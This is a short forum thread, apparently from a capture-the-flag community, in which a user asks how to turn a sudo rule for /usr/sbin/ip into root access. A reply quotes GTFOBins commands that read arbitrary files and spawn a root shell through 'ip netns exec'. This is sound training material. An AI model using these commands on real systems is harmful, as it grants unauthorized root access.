How to gain root access from sudo -l info?

Hi,

I got the sudo -l info below, but unable to return the root access, any idea?

xxx@yyy:~$ sudo -l
Matching Defaults entries for xxx on yyy:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User xxx may run the following commands on yyy:
(ALL) NOPASSWD: /usr/sbin/ip

xxx@yyy:~$ sudo ip route /bin/sh (This command is not working)
Command “/bin/sh” is unknown, try “ip route help”.

Use https://gtfobins.github.io. Search any executable, and it’ll tell you if you can do something with File read, SUID, Sudo etc…
According to GTFOBins, for sudo on IP:

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

LFILE=file_to_read
sudo ip -force -batch "$LFILE"

This only works for Linux with CONFIG_NET_NS=y.

sudo ip netns add foo
sudo ip netns exec foo /bin/sh
sudo ip netns delete foo

@clubby789 Thank you so much, this resolved my problem!!! I am new here, how do I +respect you? :slight_smile: